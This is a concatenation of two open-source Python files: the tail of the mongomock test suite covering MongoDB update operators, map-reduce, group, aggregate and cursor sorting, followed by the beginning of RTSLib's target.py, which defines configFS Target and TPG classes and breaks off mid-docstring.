self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'data.age1': 1}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'ann'}, {'$setOnInsert': {'data.age': 1}})
self.cmp.compare.find()
def test__setOnInsert_subdocument_upsert(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': {'age': 0}})
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'data.age': 1}}, True)
self.cmp.compare.find()
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'data.age1': 1}}, True)
self.cmp.compare.find()
self.cmp.do.update({'name': 'ann'}, {'$setOnInsert': {'data.age': 1}}, True)
self.cmp.compare.find()
def test__inc_subdocument_positional(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': [{'age': 0}, {'age': 1}]})
self.cmp.do.update({'name': 'bob', 'data': {'$elemMatch': {'age': 0}}},
{'$setOnInsert': {'data.$.age': 1}})
self.cmp.compare.find()
def test__inc_subdocument_positional_upsert(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': [{'age': 0}, {'age': 1}]})
self.cmp.do.update({'name': 'bob', 'data': {'$elemMatch': {'age': 0}}},
{'$setOnInsert': {'data.$.age': 1}}, True)
self.cmp.compare.find()
def test__addToSet(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$addToSet': {'hat':'green'}})
self.cmp.compare.find({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name': 'bob'}, {'$addToSet': {'hat':'tall'}})
self.cmp.compare.find({'name': 'bob'})
def test__addToSet_nested(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$addToSet': {'hat.color':'green'}})
self.cmp.compare.find({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name': 'bob'}, {'$addToSet': {'hat.color':'tall'}})
self.cmp.compare.find({'name': 'bob'})
def test__addToSet_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$addToSet': {'hat': {'$each' : ['green', 'yellow']}}})
self.cmp.compare.find({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$addToSet': {'shirt.color': {'$each' : ['green', 'yellow']}}})
self.cmp.compare.find({'name': 'bob'})
def test__pull(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$pull': {'hat': 'green'}})
self.cmp.compare.find({'name': 'bob'})
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': ['green', 'tall']})
self.cmp.do.update({'name': 'bob'}, {'$pull': {'hat': 'green'}})
self.cmp.compare.find({'name': 'bob'})
def test__pull_query(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'size': 5}, {'size': 10}]})
self.cmp.do.update({'name': 'bob'}, {'$pull': {'hat': {'size': {'$gt': 6}}}})
self.cmp.compare.find({'name': 'bob'})
def test__pull_nested_dict(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': [{'size': 'L', 'quantity': 3}, {'size': 'XL', 'quantity': 4}], 'colors': ['green', 'blue']}, {'name': 'cap', 'sizes': [{'size': 'S', 'quantity': 10}, {'size': 'L', 'quantity': 5}], 'colors': ['blue']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$pull': {'hat.$.sizes': {'size': 'L'}}})
self.cmp.compare.find({'name': 'bob'})
def test__pull_nested_list(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': ['L', 'XL']}, {'name': 'cap', 'sizes': ['S', 'L']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$pull': {'hat.$.sizes': 'XL'}})
self.cmp.compare.find({'name': 'bob'})
def test__pullAll(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat': ['green']}})
self.cmp.compare.find({'name': 'bob'})
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat': ['green', 'blue']}})
self.cmp.compare.find({'name': 'bob'})
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': ['green', 'tall', 'blue']})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat': ['green']}})
self.cmp.compare.find({'name': 'bob'})
def test__pullAll_nested_dict(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': {'properties' : {'sizes': ['M', 'L', 'XL']}}})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat.properties.sizes': ['M']}})
self.cmp.compare.find({'name': 'bob'})
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': {'properties' : {'sizes': ['M', 'L', 'XL']}}})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat.properties.sizes': ['M', 'L']}})
self.cmp.compare.find({'name': 'bob'})
def test__push(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': ['green', 'tall']})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': 'wide'}})
self.cmp.compare.find({'name': 'bob'})
def test__push_dict(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': ['L', 'XL']}]})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': {'name': 'cap', 'sizes': ['S', 'L']}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': ['green', 'tall']})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': {'$each': ['wide', 'blue']}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_dict(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': [{'size': 'L', 'quantity': 3}, {'size': 'XL', 'quantity': 4}], 'colors': ['green', 'blue']}, {'name': 'cap', 'sizes': [{'size': 'S', 'quantity': 10}, {'size': 'L', 'quantity': 5}], 'colors': ['blue']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$push': {'hat.$.sizes': {'size': 'M', 'quantity': 6}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_dict_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': [{'size': 'L', 'quantity': 3}, {'size': 'XL', 'quantity': 4}], 'colors': ['green', 'blue']}, {'name': 'cap', 'sizes': [{'size': 'S', 'quantity': 10}, {'size': 'L', 'quantity': 5}], 'colors': ['blue']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$push': {'hat.$.sizes': {'$each': [{'size': 'M', 'quantity': 6}, {'size': 'S', 'quantity': 1}]}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_list_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': ['L', 'XL'], 'colors': ['green', 'blue']}, {'name': 'cap', 'sizes': ['S', 'L'], 'colors': ['blue']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$push': {'hat.$.sizes': {'$each': ['M', 'S']}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_attribute(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': {'data': {'sizes': ['XL']}}})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat.data.sizes': 'L'}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_attribute_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': {}})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat.first': {'$each': ['a', 'b']}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_to_absent_nested_attribute(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat.data.sizes': 'L'}})
self.cmp.compare.find({'name': 'bob'})
def test__push_to_absent_field(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': 'wide'}})
self.cmp.compare.find({'name': 'bob'})
def test__push_each_to_absent_field(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': {'$each': ['wide', 'blue']}}})
self.cmp.compare.find({'name': 'bob'})
def test__drop(self):
self.cmp.do.insert({"name" : "another new"})
self.cmp.do.drop()
self.cmp.compare.find({})
def test__ensure_index(self):
# Does nothing - just make sure it exists and takes the right args
self.cmp.do.ensure_index("name")
self.cmp.do.ensure_index("hat", cache_for = 100)
self.cmp.do.ensure_index([("name", 1), ("hat", -1)])
def test__drop_index(self):
# Does nothing - just make sure it exists and takes the right args
self.cmp.do.drop_index("name")
def test__index_information(self):
# Does nothing - just make sure it exists
self.cmp.do.index_information()
class MongoClientCollectionTest(_CollectionTest, _MongoClientMixin):
pass
class PymongoCollectionTest(_CollectionTest, _PymongoConnectionMixin):
pass
@skipIf(not _HAVE_PYMONGO,"pymongo not installed")
@skipIf(not _HAVE_MAP_REDUCE,"execjs not installed")
class CollectionMapReduceTest(TestCase):
def setUp(self):
self.db = mongomock.Connection().map_reduce_test
self.data = [{"x": 1, "tags": ["dog", "cat"]},
{"x": 2, "tags": ["cat"]},
{"x": 3, "tags": ["mouse", "cat", "dog"]},
{"x": 4, "tags": []}]
for item in self.data:
self.db.things.insert(item)
self.map_func = Code("""
function() {
this.tags.forEach(function(z) {
emit(z, 1);
});
}""")
self.reduce_func = Code("""
function(key, values) {
var total = 0;
for(var i = 0; i<values.length; i++) {
total += values[i];
}
return total;
}""")
self.expected_results = [{'_id': 'mouse', 'value': 1},
{'_id': 'dog', 'value': 2},
{'_id': 'cat', 'value': 3}]
def test__map_reduce(self):
self._check_map_reduce(self.db.things, self.expected_results)
def test__map_reduce_clean_res_colc(self):
#Checks that the result collection is cleaned between calls
self._check_map_reduce(self.db.things, self.expected_results)
more_data = [{"x": 1, "tags": []},
{"x": 2, "tags": []},
{"x": 3, "tags": []},
{"x": 4, "tags": []}]
for item in more_data:
self.db.more_things.insert(item)
expected_results = []
self._check_map_reduce(self.db.more_things, expected_results)
def _check_map_reduce(self, colc, expected_results):
result = colc.map_reduce(self.map_func, self.reduce_func, 'myresults')
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'myresults')
self.assertEqual(result.count(), len(expected_results))
for doc in result.find():
self.assertIn(doc, expected_results)
def test__map_reduce_son(self):
result = self.db.things.map_reduce(self.map_func, self.reduce_func, out=SON([('replace', 'results'), ('db', 'map_reduce_son_test')]))
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'results')
self.assertEqual(result._Collection__database.name, 'map_reduce_son_test')
self.assertEqual(result.count(), 3)
for doc in result.find():
self.assertIn(doc, self.expected_results)
def test__map_reduce_full_response(self):
expected_full_response = {'counts': {'input': 4, 'reduce': 2, 'emit': 6, 'output': 3}, 'timeMillis': 5, 'ok': 1.0, 'result': 'myresults'}
result = self.db.things.map_reduce(self.map_func, self.reduce_func, 'myresults', full_response=True)
self.assertTrue(isinstance(result, dict))
self.assertEqual(result['counts'], expected_full_response['counts'])
self.assertEqual(result['result'], expected_full_response['result'])
for doc in getattr(self.db, result['result']).find():
self.assertIn(doc, self.expected_results)
def test__map_reduce_with_query(self):
expected_results = [{'_id': 'mouse', 'value': 1},
{'_id': 'dog', 'value': 2},
{'_id': 'cat', 'value': 2}]
result = self.db.things.map_reduce(self.map_func, self.reduce_func, 'myresults', query={'tags': 'dog'})
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'myresults')
self.assertEqual(result.count(), 3)
for doc in result.find():
self.assertIn(doc, expected_results)
def test__map_reduce_with_limit(self):
result = self.db.things.map_reduce(self.map_func, self.reduce_func, 'myresults', limit=2)
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'myresults')
self.assertEqual(result.count(), 2)
def test__inline_map_reduce(self):
result = self.db.things.inline_map_reduce(self.map_func, self.reduce_func)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 3)
for doc in result:
self.assertIn(doc, self.expected_results)
def test__inline_map_reduce_full_response(self):
expected_full_response = {'counts': {'input': 4, 'reduce': 2, 'emit': 6, 'output': 3}, 'timeMillis': 5, 'ok': 1.0, 'result': [{'_id': 'cat', 'value': 3}, {'_id': 'dog', 'value': 2}, {'_id': 'mouse', 'value': 1}]}
result = self.db.things.inline_map_reduce(self.map_func, self.reduce_func, full_response=True)
self.assertTrue(isinstance(result, dict))
self.assertEqual(result['counts'], expected_full_response['counts'])
for doc in result['result']:
self.assertIn(doc, self.expected_results)
def test__map_reduce_with_object_id(self):
obj1 = ObjectId()
obj2 = ObjectId()
data = [{"x": 1, "tags": [obj1, obj2]},
{"x": 2, "tags": [obj1]}]
for item in data:
self.db.things_with_obj.insert(item)
expected_results = [{'_id': obj1, 'value': 2},
{'_id': obj2, 'value': 1}]
result = self.db.things_with_obj.map_reduce(self.map_func, self.reduce_func, 'myresults')
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'myresults')
self.assertEqual(result.count(), 2)
for doc in result.find():
self.assertIn(doc, expected_results)
@skipIf(not _HAVE_PYMONGO,"pymongo not installed")
@skipIf(not _HAVE_MAP_REDUCE,"execjs not installed")
class _GroupTest(_CollectionComparisonTest):
def setUp(self):
_CollectionComparisonTest.setUp(self)
self._id1 = ObjectId()
self.data = [
{"a": 1, "count": 4 },
{"a": 1, "count": 2 },
{"a": 1, "count": 4 },
{"a": 2, "count": 3 },
{"a": 2, "count": 1 },
{"a": 1, "count": 5 },
{"a": 4, "count": 4 },
{"b": 4, "foo": 4 },
{"b": 2, "foo": 3, "name":"theone" },
{"b": 1, "foo": 2 },
{"b": 1, "foo": self._id1 },
]
for item in self.data:
self.cmp.do.insert(item)
def test__group1(self):
key = ["a"]
initial = {"count":0}
condition = {"a": {"$lt": 3}}
reduce_func = Code("""
function(cur, result) { result.count += cur.count }
""")
self.cmp.compare.group(key, condition, initial, reduce_func)
def test__group2(self):
reduce_func = Code("""
function(cur, result) { result.count += 1 }
""")
self.cmp.compare.group( key = ["b"],
condition = {"foo":{"$in":[3,4]}, "name":"theone"},
initial = {"count": 0},
reduce = reduce_func,
)
def test__group3(self):
reducer=Code("""
function(obj, result) {result.count+=1 }
""")
conditions = {
'foo':{'$in':[self._id1]},
}
self.cmp.compare.group(key=['foo'],
condition=conditions,
initial={"count": 0},
reduce=reducer)
class MongoClientGroupTest(_GroupTest, _MongoClientMixin):
pass
class PymongoGroupTest(_GroupTest, _PymongoConnectionMixin):
pass
@skipIf(not _HAVE_PYMONGO,"pymongo not installed")
@skipIf(not _HAVE_MAP_REDUCE,"execjs not installed")
class _AggregateTest(_CollectionComparisonTest):
def setUp(self):
_CollectionComparisonTest.setUp(self)
self.data = [{"_id":ObjectId(), "a": 1, "count": 4, "swallows":['European swallow'] },
{"_id":ObjectId(), "a": 1, "count": 2, "swallows":['African swallow'] },
{"_id":ObjectId(), "a": 1, "count": 4, "swallows":['European swallow'] },
{"_id":ObjectId(), "a": 2, "count": 3, "swallows":['African swallow', 'European swallow'] },
{"_id":ObjectId(), "a": 2, "count": 1, "swallows":[] },
{"_id":ObjectId(), "a": 1, "count": 5, "swallows":['African swallow', 'European swallow'] },
{"_id":ObjectId(), "a": 4, "count": 4, "swallows":['unladen swallow'] }]
for item in self.data:
self.cmp.do.insert(item)
#self.expected_results = [{"a": 1, "count": 15}]
def test__aggregate1(self):
pipeline = [
{
'$match': {'a':{'$lt':3}}
},
{
'$sort':{'_id':-1}
},
]
self.cmp.compare.aggregate(pipeline)
def test__aggregate2(self):
pipeline = [
{
'$group': {
'_id': '$a',
'count': {'$sum': '$count'}
}
},
{
'$match': {'a':{'$lt':3}}
},
{
'$sort': {'_id': -1, 'count': 1}
},
]
self.cmp.compare.aggregate(pipeline)
def test__aggregate3(self):
pipeline = [{'$group': {'_id': 'a',
'count': {'$sum': '$count'}}},
{'$match': {'a':{'$lt':3}}},
{'$sort': {'_id': -1, 'count': 1}},
{'$skip': 1},
{'$limit': 2}]
self.cmp.compare.aggregate(pipeline)
def test__aggregate4(self):
pipeline = [{'$unwind': '$swallows'}
, {'$sort': {'count':-1, 'swallows': -1}}
]
self.cmp.compare.aggregate(pipeline)
class MongoClientAggregateTest(_AggregateTest, _MongoClientMixin):
pass
class PymongoAggregateTest(_AggregateTest, _PymongoConnectionMixin):
pass
def _LIMIT(*args):
return lambda cursor: cursor.limit(*args)
def _SORT(*args):
return lambda cursor: cursor.sort(*args)
def _SKIP(*args):
return lambda cursor: cursor.skip(*args)
class _SortSkipLimitTest(_CollectionComparisonTest):
def setUp(self):
super(_SortSkipLimitTest, self).setUp()
self.cmp.do.insert([{"_id":i, "index" : i} for i in range(30)])
def test__skip(self):
self.cmp.compare(_SORT("index", 1), _SKIP(10)).find()
def test__limit(self):
self.cmp.compare(_SORT("index", 1), _LIMIT(10)).find()
def test__skip_and_limit(self):
self.cmp.compare(_SORT("index", 1), _SKIP(10), _LIMIT(10)).find()
def test__sort_name(self):
self.cmp.do.remove()
for data in ({"a" : 1, "b" : 3, "c" : "data1"},
{"a" : 2, "b" : 2, "c" : "data3"},
{"a" : 3, "b" : 1, "c" : "data2"}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT("a")).find()
self.cmp.compare(_SORT("b")).find()
def test__sort_name_nested_doc(self):
self.cmp.do.remove()
for data in ({"root": {"a" : 1, "b" : 3, "c" : "data1"}},
{"root": {"a" : 2, "b" : 2, "c" : "data3"}},
{"root": {"a" : 3, "b" : 1, "c" : "data2"}}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT("root.a")).find()
self.cmp.compare(_SORT("root.b")).find()
def test__sort_name_nested_list(self):
self.cmp.do.remove()
for data in ({"root": [{"a" : 1, "b" : 3, "c" : "data1"}]},
{"root": [{"a" : 2, "b" : 2, "c" : "data3"}]},
{"root": [{"a" : 3, "b" : 1, "c" : "data2"}]}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT("root.0.a")).find()
self.cmp.compare(_SORT("root.0.b")).find()
def test__sort_list(self):
self.cmp.do.remove()
for data in ({"a" : 1, "b" : 3, "c" : "data1"},
{"a" : 2, "b" : 2, "c" : "data3"},
{"a" : 3, "b" : 1, "c" : "data2"}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT([("a", 1), ("b", -1)])).find()
self.cmp.compare(_SORT([("b", 1), ("a", -1)])).find()
self.cmp.compare(_SORT([("b", 1), ("a", -1), ("c", 1)])).find()
def test__sort_list_nested_doc(self):
self.cmp.do.remove()
for data in ({"root": {"a" : 1, "b" : 3, "c" : "data1"}},
{"root": {"a" : 2, "b" : 2, "c" : "data3"}},
{"root": {"a" : 3, "b" : 1, "c" : "data2"}}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT([("root.a", 1), ("root.b", -1)])).find()
self.cmp.compare(_SORT([("root.b", 1), ("root.a", -1)])).find()
self.cmp.compare(_SORT([("root.b", 1), ("root.a", -1), ("root.c", 1)])).find()
def test__sort_list_nested_list(self):
self.cmp.do.remove()
for data in ({"root": [{"a" : 1, "b" : 3, "c" : "data1"}]},
{"root": [{"a" : 2, "b" : 2, "c" : "data3"}]},
{"root": [{"a" : 3, "b" : 1, "c" : "data2"}]}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT([("root.0.a", 1), ("root.0.b", -1)])).find()
self.cmp.compare(_SORT([("root.0.b", 1), ("root.0.a", -1)])).find()
self.cmp.compare(_SORT([("root.0.b", 1), ("root.0.a", -1), ("root.0.c", 1)])).find()
def test__close(self):
# Does nothing - just make sure it exists and takes the right args
self.cmp.do(lambda cursor: cursor.close()).find()
class MongoClientSortSkipLimitTest(_SortSkipLimitTest, _MongoClientMixin):
pass
class PymongoConnectionSortSkipLimitTest(_SortSkipLimitTest, _PymongoConnectionMixin):
pass
class InsertedDocumentTest(TestCase):
def setUp(self):
super(InsertedDocumentTest, self).setUp()
self.collection = mongomock.Connection().db.collection
self.data = {"a" : 1, "b" : [1, 2, 3], "c" : {"d" : 4}}
self.orig_data = copy.deepcopy(self.data)
self.object_id = self.collection.insert(self.data)
def test__object_is_consistent(self):
[object] = self.collection.find()
self.assertEquals(object["_id"], self.object_id)
def test__find_by_id(self):
[object] = self.collection.find({"_id" : self.object_id})
self.assertEquals(object, self.data)
def test__remove_by_id(self):
self.collection.remove(self.object_id)
self.assertEqual(0, self.collection.count())
def test__inserting_changes_argument(self):
#Like pymongo, we should fill the _id in the inserted dict (odd behavior, but we need to stick to it)
self.assertEquals(self.data, dict(self.orig_data, _id=self.object_id))
def test__data_is_copied(self):
[object] = self.collection.find()
self.assertEquals(dict(self.orig_data, _id=self.object_id), object)
self.data.pop("a")
self.data["b"].append(5)
self.assertEquals(dict(self.orig_data, _id=self.object_id), object)
[object] = self.collection.find()
self.assertEquals(dict(self.orig_data, _id=self.object_id), object)
def test__find_returns_copied_object(self):
[object1] = self.collection.find()
[object2] = self.collection.find()
self.assertEquals(object1, object2)
self.assertIsNot(object1, object2)
object1["b"].append("bla")
self.assertNotEquals(object1, object2)
class ObjectIdTest(TestCase):
def test__equal_with_same_id(self):
obj1 = ObjectId()
obj2 = ObjectId(str(obj1))
self.assertEqual(obj1, obj2)
class DatabasesNamesTest(TestCase):
def setUp(self):
super(DatabasesNamesTest, self).setUp()
self.conn = mongomock.Connection()
def test__database_names(self):
self.conn.unit.tests.insert({'foo': 'bar'})
self.conn.foo.bar.insert({'unit': 'test'})
names = self.conn.database_names()
self.assertIsInstance(names, list)
self.assertEquals(sorted(['foo', 'unit']), sorted(names))
|
|
'''
Implements the RTS generic Target fabric classes.
This file is part of RTSLib.
Copyright (c) 2011-2013 by Datera, Inc.
Copyright (c) 2011-2014 by Red Hat, Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
'''
import os
from glob import iglob as glob
from functools import partial
from six.moves import range
import uuid
from .node import CFSNode
from .utils import RTSLibBrokenLink, RTSLibError
from .utils import fread, fwrite, normalize_wwn, generate_wwn
from .utils import dict_remove, set_attributes, set_parameters, ignored
from .utils import _get_auth_attr, _set_auth_attr
from . import tcm
import six
auth_params = ('userid', 'password', 'mutual_userid', 'mutual_password')
class Target(CFSNode):
'''
This is an interface to Targets in configFS.
A Target is identified by its wwn.
To a Target is attached a list of TPG objects.
'''
# Target private stuff
def __repr__(self):
return "<Target %s/%s>" % (self.fabric_module.name, self.wwn)
def __init__(self, fabric_module, wwn=None, mode='any'):
'''
@param fabric_module: The target's fabric module.
@type fabric_module: FabricModule
@param wwn: The optional Target's wwn.
If no wwn is specified, one will be generated.
@type wwn: string
@param mode:An optionnal string containing the object creation mode:
- I{'any'} means the configFS object will be either looked up
or created.
- I{'lookup'} means the object MUST already exist configFS.
- I{'create'} means the object must NOT already exist in configFS.
@type mode:string
@return: A Target object.
'''
super(Target, self).__init__()
self.fabric_module = fabric_module
fabric_module._check_self()
if wwn is not None:
# old versions used wrong NAA prefix, fixup
if wwn.startswith("naa.6"):
wwn = "naa.5" + wwn[5:]
self.wwn, self.wwn_type = fabric_module.to_normalized_wwn(wwn)
elif not fabric_module.wwns:
self.wwn = generate_wwn(fabric_module.wwn_types[0])
self.wwn_type = fabric_module.wwn_types[0]
else:
raise RTSLibError("Fabric cannot generate WWN but it was not given")
# Checking is done, convert to format the fabric wants
fabric_wwn = fabric_module.to_fabric_wwn(self.wwn)
self._path = "%s/%s" % (self.fabric_module.path, fabric_wwn)
self._create_in_cfs_ine(mode)
def _list_tpgs(self):
self._check_self()
for tpg_dir in glob("%s/tpgt*" % self.path):
tag = os.path.basename(tpg_dir).split('_')[1]
tag = int(tag)
yield TPG(self, tag, 'lookup')
# Target public stuff
def has_feature(self, feature):
'''
Whether or not this Target has a certain feature.
'''
return self.fabric_module.has_feature(feature)
def delete(self):
'''
Recursively deletes a Target object.
This will delete all attached TPG objects and then the Target itself.
'''
self._check_self()
for tpg in self.tpgs:
tpg.delete()
super(Target, self).delete()
tpgs = property(_list_tpgs, doc="Get the list of TPG for the Target.")
@classmethod
def setup(cls, fm_obj, t, err_func):
'''
Set up target objects based upon t dict, from saved config.
Guard against missing or bad dict items, but keep going.
Call 'err_func' for each error.
'''
if 'wwn' not in t:
err_func("'wwn' not defined for Target")
return
try:
t_obj = Target(fm_obj, t['wwn'])
except RTSLibError as e:
err_func("Could not create Target object: %s" % e)
return
for tpg in t.get('tpgs', []):
TPG.setup(t_obj, tpg, err_func)
def dump(self):
d = super(Target, self).dump()
d['wwn'] = self.wwn
d['fabric'] = self.fabric_module.name
d['tpgs'] = [tpg.dump() for tpg in self.tpgs]
return d
class TPG(CFSNode):
'''
This is a an interface to Target Portal Groups in configFS.
A TPG is identified by its parent Target object and its TPG Tag.
To a TPG object is attached a list of NetworkPortals. Targets without
the 'tpgts' feature cannot have more than a single TPG, so attempts
to create more will raise an exception.
'''
# TPG private stuff
def __repr__(self):
return "<TPG %d>" % self.tag
def __init__(self, parent_target, tag=None, mode='any'):
'''
@param parent_target: The parent Target object of the TPG.
@type parent_target: Target
@param tag: The TPG Tag (TPGT).
@type tag: int > 0
@param mode:An optionnal string containing the object creation mode:
- I{'any'} means the configFS object will be either looked up or
created.
- I{'lookup'} means the object MUST already exist configFS.
- I{'create'} means the object must NOT already exist in configFS.
@type mode:string
@return: A TPG object.
'''
super(TPG, self).__init__()
if tag is None:
tags = [tpg.tag for tpg in parent_target.tpgs]
for index in range(1048576):
if index not in tags and index > 0:
tag = index
break
if tag is None:
raise RTSLibError("Cannot find an available TPG Tag")
else:
tag = int(tag)
if not tag > 0:
raise RTSLibError("The TPG Tag must be >0")
self._tag = tag
if isinstance(parent_target, Target):
self._parent_target = parent_target
else:
raise RTSLibError("Invalid parent Target")
self._path = "%s/tpgt_%d" % (self.parent_target.path, self.tag)
target_path = self.parent_target.path
if not self.has_feature('tpgts') and not os.path.isdir(self._path):
for filename in os.listdir(target_path):
if filename.startswith("tpgt_") \
and os.path.isdir("%s/%s" % (target_path, filename)) \
and filename != "tpgt_%d" % self.tag:
raise RTSLibError("Target cannot have multiple TPGs")
self._create_in_cfs_ine(mode)
if self.has_feature('nexus') and not self._get_nexus():
self._set_nexus()
def _get_tag(self):
return self._tag
def _get_parent_target(self):
return self._parent_target
def _list_network_portals(self):
self._check_self()
if not self.has_feature('nps'):
return
for network_portal_dir in os.listdir("%s/np" % self.path):
(ip_address, port) = \
os.path.basename(network_portal_dir).rsplit(":", 1)
port = int(port)
yield NetworkPortal(self, ip_address, port, 'lookup')
def _get_enable(self):
self._check_self()
path = "%s/enable" % self.path
# If the TPG does not have the enable attribute, then it is always
# enabled.
if os.path.isfile(path):
return bool(int(fread(path)))
else:
return True
def _set_enable(self, boolean):
'''
Enables or disables the TPG. If the TPG doesn't support the enable
attribute, do nothing.
'''
self._check_self()
path = "%s/enable" % self.path
if os.path.isfile(path) and (boolean != self._get_enable()):
try:
fwrite(path, str(int(boolean)))
except IOError as e:
raise RTSLibError("Cannot change enable state: %s" % e)
def _get_nexus(self):
'''
Gets the nexus initiator WWN, or None if the TPG does not have one.
'''
self._check_self()
if self.has_feature('nexus'):
try:
nexus_wwn = fread("%s/nexus" % self.path)
except IOError:
nexus_wwn = ''
return nexus_wwn
else:
return None
def _set_nexus(self, nexus_wwn=None):
'''
Sets the nexus initiator WWN. Raises an exception if the nexus is
already set or if the TPG does not use a nexus.
'''
self._check_self()
if not self.has_feature('nexus'):
raise RTSLibError("The TPG does not use a nexus")
if self._get_nexus():
raise RTSLibError("The TPG's nexus initiator WWN is already set")
fm = self.parent_target.fabric_module
if nexus_wwn:
nexus_wwn = fm.to_normalized_wwn(nexus_wwn)[0]
else:
# Nexus wwn type should match parent target
nexus_wwn = generate_wwn(self.parent_target.wwn_type)
fwrite("%s/nexus" % self.path, fm.to_fabric_wwn(nexus_wwn))
def _list_node_acls(self):
self._check_self()
if not self.has_feature('acls'):
return
node_acl_dirs = [os.path.basename(path)
for path in os.listdir("%s/acls" % self.path)]
for node_acl_dir in node_acl_dirs:
fm = self.parent_target.fabric_module
yield NodeACL(self, fm.from_fabric_wwn(node_acl_dir), 'lookup')
def _list_node_acl_groups(self):
self._check_self()
if not self.has_feature('acls'):
return
names = set([])
for na in self.node_acls:
tag = na.tag
if tag:
names.add(tag)
return (NodeACLGroup(self, n) for n in names)
def _list_luns(self):
self._check_self()
lun_dirs = [os.path.basename(path)
for path in os.listdir("%s/lun" % self.path)]
for lun_dir in lun_dirs:
lun = lun_dir.split('_')[1]
lun = int(lun)
yield LUN(self, lun)
def _control(self, command):
self._check_self()
path = "%s/control" % self.path
fwrite(path, "%s\n" % str(command))
# TPG public stuff
def has_feature(self, feature):
'''
Whether or not this TPG has a certain feature.
'''
return self.parent_target.has_feature(feature)
def delete(self):
'''
Recursively deletes a TPG object.
This will delete all attached LUN, NetworkPortal and Node ACL objects
